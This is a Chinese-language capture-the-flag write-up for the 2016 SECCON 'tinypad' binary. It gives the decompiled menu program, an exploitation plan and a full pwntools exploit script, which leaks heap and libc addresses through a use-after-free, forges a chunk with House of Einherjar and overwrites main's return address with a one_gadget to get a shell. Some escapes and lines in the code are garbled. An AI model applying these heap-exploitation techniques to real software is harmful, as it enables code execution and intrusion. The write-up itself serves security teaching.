2016 Seccon——tinypad

64位程序　　#House Of Einherjar　　#use after free

程序逻辑

1 int __cdecl main(int argc, const char **argv, const char **envp)

2 {

3
__int64 v3; // rdx

4
__int64 v4; // rdx

5
__int64 v5; // rdx

6
__int64 v6; // rdx

7
size_t v7; // rax

8
signed int v8; // eax

9
signed __int64 v9; // rdx

signed int v10; // eax

signed __int64 v11; // rdx

size_t v12; // rax

__int64 v13; // rdx

size_t v14; // rax

__int64 v15; // rdx

__int64 v16; // rdx

int c; // [rsp+4h] [rbp-1Ch]

int i; // [rsp+8h] [rbp-18h]

int v20; // [rsp+Ch] [rbp-14h]

int v21; // [rsp+10h] [rbp-10h]

int v22; // [rsp+14h] [rbp-Ch]

unsigned __int64 v23; // [rsp+18h] [rbp-8h]


v23 = __readfsqword(0x28u);

v21 = 0;

write_n(&unk_4019F0, 1LL, envp);

write_n(

"
============================================================================n"

"// _|_|_|_|_|
_|_|_|
_|
_|
_|
_|
_|_|_|
_|_|
_|_|_|
\\n"

"||
_|
_|
_|_|
_|
_|
_|
_|
_|
_|
_|
_|
_|
||n"

"||
_|
_|
_|
_|
_|
_|
_|_|_|
_|_|_|_|
_|
_|
||n"

"||
_|
_|
_|
_|_|
_|
_|
_|
_|
_|
_|
||n"

"\\
_|
_|_|_|
_|
_|
_|
_|
_|
_|
_|_|_|
//n"

"
============================================================================n",

563LL,

v3);

write_n(&unk_4019F0, 1LL, v4);

do

{

for ( i = 0; i <= 3; ++i )

{

LOBYTE(c) = i + 49;

writeln("+------------------------------------------------------------------------------+n", 81LL);

write_n(" #
INDEX: ", 12LL, v5);

writeln(&c, 1LL);

write_n(" # CONTENT: ", 12LL, v6);

if ( *(_QWORD *)&tinypad[16 * (i + 16LL) + 8] )

{

v7 = strlen(*(const char **)&tinypad[16 * (i + 16LL) + 8]);

writeln(*(_QWORD *)&tinypad[16 * (i + 16LL) + 8], v7);

}

writeln(&unk_4019F0, 1LL);

}

v20 = 0;

v8 = getcmd();

v21 = v8;

if ( v8 == 68 )

{

write_n("(INDEX)>>> ", 11LL, v9);

v20 = read_int();

if ( v20 > 0 && v20 <= 4 )

{

if ( *(_QWORD *)&tinypad[16 * (v20 - 1 + 16LL)] )

{

free(*(void **)&tinypad[16 * (v20 - 1 + 16LL) + 8]);

*(_QWORD *)&tinypad[16 * (v20 - 1 + 16LL)] = 0LL;

writeln("nDeleted.", 9LL);

}

else

{

writeln("Not used", 8LL);

}

}

else

{

writeln("Invalid index", 13LL);

}

}

else if ( v8 > 68 )

{

if ( v8 != 69 )

{

if ( v8 == 81 )

continue;
LABEL_43:

writeln("No such a command", 17LL);

continue;

}

write_n("(INDEX)>>> ", 11LL, v9);

v20 = read_int();

if ( v20 > 0 && v20 <= 4 )

{

if ( *(_QWORD *)&tinypad[16 * (v20 - 1 + 16LL)] )

{

c = 48;

strcpy(tinypad, *(const char **)&tinypad[16 * (v20 - 1 + 16LL) + 8]);

while ( toupper(c) != 89 )

{

write_n("CONTENT: ", 9LL, v16);

v12 = strlen(tinypad);

writeln(tinypad, v12);

write_n("(CONTENT)>>> ", 13LL, v13);

v14 = strlen(*(const char **)&tinypad[16 * (v20 - 1 + 16LL) + 8]);

read_until(tinypad, v14, 10LL);

writeln("Is it OK?", 9LL);

write_n("(Y/n)>>> ", 9LL, v15);

read_until(&c, 1LL, 10LL);

}

strcpy(*(char **)&tinypad[16 * (v20 - 1 + 16LL) + 8], tinypad);

writeln("nEdited.", 8LL);

}

else

{

writeln("Not used", 8LL);

}

}

else

{

writeln("Invalid index", 13LL);

}

}

else

{

if ( v8 != 65 )

goto LABEL_43;

while ( v20 <= 3 )

{

v9 = 16 * (v20 + 16LL);

if ( !*(_QWORD *)&tinypad[v9] )

break;

++v20;

}

if ( v20 == 4 )

{

writeln("No space is left.", 17LL);

}

else

{

v22 = -1;

write_n("(SIZE)>>> ", 10LL, v9);

v22 = read_int();

if ( v22 <= 0 )

{

v10 = 1;

}

else

{

v10 = v22;

if ( (unsigned __int64)v22 > 0x100 )

v10 = 256;

}

v22 = v10;

*(_QWORD *)&tinypad[16 * (v20 + 16LL)] = v10;

*(_QWORD *)&tinypad[16 * (v20 + 16LL) + 8] = malloc(v22);

v11 = 16 * (v20 + 16LL);

if ( !*(_QWORD *)&tinypad[v11 + 8] )

{

writerrln("[!] No memory is available.", 27LL);

exit(-1);

}

write_n("(CONTENT)>>> ", 13LL, v11);

read_until(*(_QWORD *)&tinypad[16 * (v20 + 16LL) + 8], v22, 10LL);

writeln("nAdded.", 7LL);

}

}

}

while ( v21 != 81 );

return 0;
}

add操作后内存分布，最多申请0x100的内存

0x602040
<-tinypad
0x602140
size_idx1　　　　　　　　 <-tinypad+256
0x602148
ptr_idx1
0x602150
size_idx2
0x602158
ptr_idx2
0x602160
size_idx3
0x602168
ptr_idx3
0x602170
size_idx4
0x602178
ptr_idx4

edit操作时先判断相应idx的size是否为0，然后用strlen计算len，并读入len长度的新内容

新内容写入0x602040处，再strcpy到对应的ptr处

每次菜单前会输出每个ptr的内容，由于free后没有置NULL，所以可以用来泄漏地址

利用思路

 

1. 利用删除时没有将指针置为 NULL 的 UAF 漏洞，泄漏堆的基地址
2. 再次利用 UAF 漏洞泄漏 libc 的基地址。
3. 利用 house of einherjar 方法在 tinypad 的前 256 字节中伪造 chunk。当我们再次申请时，那么就可以控制 4 个 memo 的指针和内容了。
4. 这里虽然我们的第一想法可能是直接覆盖 malloc_hook 为 one_gadget 地址，但是，由于当编辑时，程序是利用 strlen 来判读可以读取多少长度，而 malloc_hook 则在初始时为 0。所以我们直接覆盖，所以这里采用其他方法，即修改程序的 main 函数的返回地址为 one_gadget，之所以可以行得通，是因为返回地址往往是 7f 开头的，长度足够长，可以覆盖为 one_gadget。所以我们还是需要泄漏 main 函数的返回地址，由于 libc 中存储了 main 函数 environ 指针的地址，所以我们可以先泄露出 environ 的地址，然后在得知存储 main 函数的返回地址的地址。这里选取 environ 符号是因为 environ 符号在 libc 中会导出，而像 argc 和 argv 则不会导出，相对来说会比较麻烦一点。
5. 最后修改 main 函数的返回地址为 one_gadget 地址获取 shell。

expolit

 

from pwn import *
sh=process('tinypad')
elf=ELF('tinypad')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
main_arena_offset=0x3c4b20

def add(size,content):

sh.recvuntil('(CMD)>>> ')

sh.sendline('a')

sh.recvuntil('(SIZE)>>> ')

sh.sendline(str(size))

sh.recvuntil('(CONTENT)>>> ')

sh.sendline(content)

def edit(idx,content):

sh.recvuntil('(CMD)>>> ')

sh.sendline('e')

sh.recvuntil('(INDEX)>>> ')

sh.sendline(str(idx))

sh.recvuntil('(CONTENT)>>> ')

sh.sendline(content)

sh.recvuntil('Is it OK?n')

sh.sendline('Y')

def delete(idx):

sh.recvuntil('(CMD)>>> ')

sh.sendline('d')

sh.recvuntil('(INDEX)>>> ')

sh.sendline(str(idx))

#leak heap_base 
add(0x70,'a'*8)
#idx1
add(0x70,'b'*8)
#idx2
add(0x100,'c'*8)
#idx3 
delete(2)
delete(1)　　　　　　#fastbin 0x70 idx1->idx2->NULL
idx1->fd=idx2
sh.recvuntil('# CONTENT: ')
data=sh.recvuntil('n',drop=True)
heap_base=u64(data.ljust(8,'x00'))-0x80
print 'heap_base: '+hex(heap_base)
#leak libc_base 
delete(3)　　　　　　#now idx3 merge into top chunk , idx2 merge with idx1 , idx1->fd=unsorted_bin_adr　　　　　　
unsorted_offset_arena=88
sh.recvuntil('# CONTENT: ')
data=sh.recvuntil('n',drop=True)
unsorted_bin_adr=u64(data.ljust(8,'x00'))
main_arena=unsorted_bin_adr-unsorted_offset_arena
libc_base=main_arena-main_arena_offset
print 'libc_base: '+hex(libc_base)

#house of einherjar
add(0x18,'a'*0x18)
#idx1　　　重用idx2的prev_size 可溢出覆盖
add(0x100,'b'*0xf8+'x11')
#idx2
#after overflow 0x111->0x100
#'x11' is next fake_chunk->size
add(0x100,'c'*0xf8)
#idx3
add(0x100,'d'*0xf8)
#idx4

#tinypad+0x20 -> fake_chunk
#*(tinypad+0x100+0x20)=next_chunk->prev_size=size_idx3=0x100
tinypad_adr=0x602040
fakechunk_adr=tinypad_adr+0x20
fakechunk_size=0x101
fakechunk=p64(0)+p64(fakechunk_size)+p64(fakechunk_adr)+p64(fakechunk_adr)
edit(3,'d'*0x20+fakechunk)

#overflow idx2->prev_size
idx2->size->inuse
diff=heap_base+0x20-fakechunk_adr
diff_strip=p64(diff).strip('')
number_of_zeros=len(p64(diff))-len(diff_strip)
for i in range(number_of_zeros+1):

data=diff_strip.rjust(0x18-i,'f')

edit(1,data)

delete(2)
#unlink make fake_chunk at tinypad+0x20 (0xf0+0x10)
sh.recvuntil('nDeleted.')
#make fake_chunk in unsorted bin 0xf0+0x10
#gdb.attach(sh)
edit(4,'d'*0x20+p64(0)+p64(0x101)+p64(main_arena+88)+p64(main_arena+88))　　#pass unsorted bin check

one_gadget_adr=libc_base+0x45216
environ_pointer=libc_base+libc.symbols['__environ']
print 'one_gadget_adr: '+hex(one_gadget_adr)
print 'environ_pointer: '+hex(environ_pointer)

#leak environ_adr -> leak main_ret_adr
fake_pad='f'*(0x100-0x20-0x10)+'a'*8+p64(environ_pointer)+'a'*8+p64(0x602148)
add(0xf0,fake_pad) #idx2
#gdb.attach(sh)

#ptr_idx1=environ_pointer ptr_idx2=0x602148=&(ptr_idx1)
sh.recvuntil(' # CONTENT: ')
environ_adr=sh.recvuntil('n', drop=True).ljust(8, 'x00')
environ_adr=u64(environ_adr)
main_ret_adr=environ_adr-30*8
edit(2,p64(main_ret_adr))
edit(1,p64(one_gadget_adr))
sh.sendline('Q')
sh.interactive()